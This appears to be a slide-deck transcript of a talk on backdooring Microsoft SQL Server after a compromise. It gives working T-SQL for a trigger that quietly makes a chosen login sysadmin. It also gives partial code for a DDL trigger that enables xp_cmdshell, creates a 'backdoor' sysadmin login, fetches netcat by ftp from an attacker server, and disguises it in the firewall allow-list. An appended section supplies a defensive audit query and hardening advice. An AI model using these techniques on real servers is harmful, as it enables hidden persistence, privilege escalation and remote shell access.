Duong Ngo October 14, 2009
Jan 13, 2016
POST-EXPLOITATION
Got access to an MSSQL box? (SQL injection, brute force, ...)
Privileges: sa / dbo / normal user
Got all the data
Now what’s next??
Backdoors
Provide easier access to the compromised box in the future
Types of backdoors: OS backdoors (rootkits), web server backdoors (PHPshell, CGITelnet, ...)
So how about a database backdoor?? YES!
SQL Server 2005 Backdoor
We’ll create a backdoor based on a SQL Server trigger.
What’s a trigger?
Database Trigger
A special kind of stored procedure that executes automatically when a user attempts the specified data-modification statement (INSERT, UPDATE, DELETE, ...) on the specified table.
The trigger executes under the security context of the user who caused it to fire!
EXAMPLE – Create trigger
Context: a normal user with CREATE TRIGGER permission:
CREATE TRIGGER trg_gain_privilege ON tblCustomers FOR INSERT, DELETE, UPDATE
AS
EXEC sp_addsrvrolemember @loginame = 'Hacker', @rolename = N'sysadmin'
EXAMPLE – Trigger gets fired
Context: sa (server admin)
sa> DELETE FROM tblCustomers
RESULT?? User “Hacker” has now become a sysadmin
What can we do with that?
- Privilege escalation: normal user -> higher role
- Database backdoor
SQL Server backdoor features:
- Execute the subsequent commands only if the current user is 'sa'
- Enable xp_cmdshell
- Create a new login 'backdoor' and add it to the sysadmin server role
- Disable firewall notification mode
- Add ftp to the allowed-programs list
- Get netcat from the attacker's ftp server
- Create a directory 'Backdoor_activated' on the attacker's ftp server to let the attacker know whenever the backdoor has been started
- Open netcat in listen mode attached to the SQL command-line client osql
Our Backdoor’s Code
CREATE TRIGGER trg_backdoor ON DATABASE FOR DDL_DATABASE_LEVEL_EVENTS
AS
BEGIN
DECLARE @cur_user varchar(200)
……
CREATE LOGIN [backdoor] WITH PASSWORD = 'Backdoor123#';
EXEC sys.sp_addsrvrolemember @loginame = N'Backdoor', @rolename = N'sysadmin'
-- disable firewall notification mode
EXEC master..xp_cmdshell 'netsh firewall set notifications disable'
…..
Why DDL_DATABASE_LEVEL_EVENTS? Because it covers all of the events below, so the trigger fires on any of them:
CREATE_TABLE ALTER_TABLE DROP_TABLE CREATE_VIEW ALTER_VIEW DROP_VIEW
CREATE_SYNONYM DROP_SYNONYM CREATE_FUNCTION ALTER_FUNCTION DROP_FUNCTION
CREATE_PROCEDURE ALTER_PROCEDURE DROP_PROCEDURE CREATE_TRIGGER ALTER_TRIGGER
DROP_TRIGGER CREATE_EVENT_NOTIFICATION DROP_EVENT_NOTIFICATION
……
Our Backdoor’s Code (cont)
-- save ftp commands to an external file
SET @cmd = 'echo GET ' + @fileget + ' >> ' + @cmdfile
…..
-- execute ftp with commands loaded from the file we created
SET @cmd = 'ftp -s:' + @cmdfile
EXEC master..xp_cmdshell @cmd, NO_OUTPUT
……
-- after getting netcat, add it to the firewall’s allowed-program list
SET @cmd = 'netsh firewall add allowedprogram program=' + @localdir + '\' + @fileget + ' name=Printer mode=ENABLE scope=ALL profile=ALL'
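A defender-side audit for this kind of trigger persistence, added here as an example and not part of the original talk: it assumes SQL Server 2005 or later, is run by a sysadmin in the database being checked, and looks for triggers whose body uses the primitives the slides rely on, plus the xp_cmdshell setting and current sysadmin membership.

```sql
-- 1. DML and DDL triggers in the current database that reference the
--    primitives used by the backdoor above (run once per database).
SELECT
    tr.name                   AS trigger_name,
    tr.parent_class_desc      AS scope,         -- DATABASE = DDL trigger
    OBJECT_NAME(tr.parent_id) AS parent_table,  -- NULL for DDL triggers
    tr.is_disabled,
    tr.create_date,
    tr.modify_date,
    m.definition
FROM sys.triggers AS tr
JOIN sys.sql_modules AS m ON m.object_id = tr.object_id
WHERE m.definition LIKE '%xp_cmdshell%'
   OR m.definition LIKE '%sp_addsrvrolemember%'
   OR m.definition LIKE '%CREATE LOGIN%'
   OR m.definition LIKE '%DDL_DATABASE_LEVEL_EVENTS%';

-- 2. Server-scoped DDL and logon triggers: these fire instance-wide,
--    so review every definition here, not only the matching ones.
SELECT st.name, st.is_disabled, st.create_date, st.modify_date, sm.definition
FROM sys.server_triggers AS st
JOIN sys.server_sql_modules AS sm ON sm.object_id = st.object_id;

-- 3. xp_cmdshell state: the backdoor enables it, so value_in_use = 1
--    on a server where it is not meant to be on is a finding.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 4. Sysadmin membership: an unexpected login (e.g. 'backdoor')
--    added recently is the end result of the trigger firing as sa.
SELECT mp.name AS sysadmin_login, mp.type_desc, mp.create_date, mp.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS rp ON rp.principal_id = rm.role_principal_id
JOIN sys.server_principals AS mp ON mp.principal_id = rm.member_principal_id
WHERE rp.name = 'sysadmin'
ORDER BY mp.create_date DESC;
```

Because the trigger only pays off when a sysadmin fires it, the complementary control is to keep routine schema work off sa and to restrict CREATE TRIGGER / ALTER on the database to principals who actually need it.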
Thank You for listening!!